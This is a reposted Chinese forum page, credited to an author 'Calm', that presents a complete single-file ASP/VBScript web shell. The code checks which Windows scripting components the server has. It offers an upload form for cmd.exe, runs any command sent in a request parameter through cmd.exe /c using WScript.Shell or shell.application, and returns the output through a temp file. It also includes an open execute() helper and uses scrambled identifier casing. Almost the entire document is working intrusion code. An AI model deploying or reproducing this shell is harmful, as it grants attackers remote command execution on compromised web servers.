shell.application asp多种组件执行cmd 单文件版本

时间:2021-10-29 21:37:16
<%@ Language="VBScript" %>
<%
Dim theComponent(7)
theComponent(0) = "Scripting.FileSystemObject"
theComponent(1) = "WScript.Shell"
theComponent(2) = "WScript.Shell.1"
theComponent(3) = "WScript.Network"
theComponent(4) = "WScript.Network.1"
theComponent(5) = "shell.application"
theComponent(6) = "shell.application.1"
Function IsObjInstalled(strClassString)
On Error Resume Next
IsObjInstalled = False
Err = 0
Dim xTestObj
Set xTestObj = Server.CreateObject(strClassString)
If -2147221005 <> Err Then
IsObjInstalled = True
Else
IsObjInstalled = False
End if
Set xTestObj = Nothing
Err = 0
End Function
%>
<tr><td>支持组件:</td></tr>
<% 
Dim i
For i=0 to UBound(theComponent)-1
If IsObjInstalled(theComponent(i)) Then
Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""green"">√</font></td></tr>" & vbCrLf
Else
Response.Write "<tr><td>" & theComponent(i) & "</td><td><font color=""red"">×</font></td></tr>" & vbCrLf
End if
Next
%>
<br>
<br>
<br>
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>
 <%
sub ShowErr()
If Err Then
jb"<br><a href='javascript:history.back()'><br>" & Err.DescrIption & "</a><br>"
Err.Clear:Response.Flush
ENd IF
End SUB
function jb(Str)
Response.WRItE(Str)
END function
Sub mbd(Str)
execute(Str)
END Sub
Function rePATH(S)
REpath=REpLAcE(s,"\","\\")
ENd Function
FuNctIon RRepaTh(S)
RREpaTH=rEplAcE(S,"\\","\")
end fUncTion
Url=REQueSt.sErVErvARiables("URL")
nimajbm=requESt.sErVeRVArIABlEs("LOCAL_ADDR")
AcTIoN=ReQUESt("Action")
RooTpATH=SeRveR.mAPpaTH(".")
WWWROOt=SErVER.MAppATH("/")
sba=request.servervariables("http_host")
appbd=rEQUEsT.seRvErVARIaBLES("PATH_INFO") 
FOLdErpAth=REqueSt("FolderPath")
ScrName=Request.ServerVariables("Script_Name")
fNAME=reQUesT("FName")
ServerU=ReQueST.SERVervaRIables("http_host")
WoriNima=Request.ServerVariables("SERVER_NAME")
O0O0=Request.ServerVariables("PATH_TRANSLATED")
WoriNiba=Request.ServerVariables("SERVER_SOFTWARE")
Worininai=Request.ServerVariables("LOCAL_ADDR")
jbmc=Request.ServerVariables("NUMBER_OF_PROCESSORS")
jbmb=Request.ServerVariables("OS")
    SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
    SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
    SI=SI&"<tr><td>"
    SI=SI&"上传路径:<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Cmd.exe")&"' size='40'>"
    SI=SI&" <input name='LocalFile' type='file'  size='25'>"
    SI=SI&" <input type='submit' name='Submit' value='上传'>"
    SI=SI&"</td></tr></form></table>"
on error resume next
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "cmd.exe"
if request("cmd")<>"" then session("defcmd") = request("cmd")
defcmd=session("defcmd")
if defcmd="" then defcmd="set"
if request("rwpath")<>"" then session("rwpath") = request("rwpath")
rwpath=session("rwpath")
if rwpath="" then rwpath=server.mappath(".")
si="<form method='post'>"
rp1="<input type=""radio"" name=""cmdtype"" value="""
si=si&"cmd:<input name='sp' value='"&shellpath&"' style='width:35%'> 回显:<input name='rwpath' value='"&rwpath&"' style='width:35%'><br>"
si=si&"<input type='hidden' name='action' value='Cmd1Shell'>"
si=si&rp1&"wscript"" checked>wscript"
si=si&rp1&"wscript.shell"">wscript.shell"
si=si&rp1&"wscript.shell.1"">wscript.shell.1"
si=si&rp1&"shell.application"">shell.application"
si=si&rp1&"shell.application.1"">shell.application.1"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input type='submit' value='执行'>"

set fso=server.createobject("scripting.filesystemobject")
sztempfile = rwpath&"\cmd.txt"
select case request("cmdtype")
case "wscript"
set cm=server.createobject("wscript.shell")
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>"
si=si&aaa
si=si&chr(13)&"</text"&"area></form>"
case "wscript.shell","wscript.shell.1"
on error resume next
set ws=server.createobject(request("cmdtype"))
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&"<text"&"area style='width:100%;height:440;' class='cmd'>"
si=si&aaa
si=si&chr(13)&"</text"&"area></form>"
case "shell.application","shell.application.1"
set seshell=server.createobject(request("cmdtype"))

seshell.ShellExecute shellpath," /c " & defcmd & " > " & sztempfile,"","open",0
si=si&"<iframe id=cmdResult src='?cmdtype=shellresult&Action=Cmd1Shell' style='width:100%;height:440;'>"
case "shellresult"
response.Clear()
on error resume next
jb "<body style=""background:#3F8805""><span style=""color:#FFFFFF"">"
if fso.fileexists(sztempfile)=true then
set ofilelcx = fso.opentextfile (sztempfile, 1, false, 0)
ss=server.htmlencode(ofilelcx.readall)
ss=replace(ss,vbnewline,"<br>")
jb ss
ofilelcx.close
call fso.deletefile(sztempfile, true)
else
jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试"
end if
if err then jb "<meta http-equiv=""refresh"" content=""1"" />程序未结束,或者没有执行成功,等待刷新试试"
jb"</span></body>"
response.end
end select
jb si
function createmdb(path)
si="<br><br>"
set c = createobject(obt(2,0))
c.create("provider=microsoft.jet.oledb.4.0;data source=" & path)
set c = nothing
if err.number=0 then
si = si & path & "建立成功!"
end if
si=si&backurl
echo si
end function
%>

 原帖地址:https://www.t00ls.net/thread-26413-1-1.html

      作者:Calm

标签:

相关文章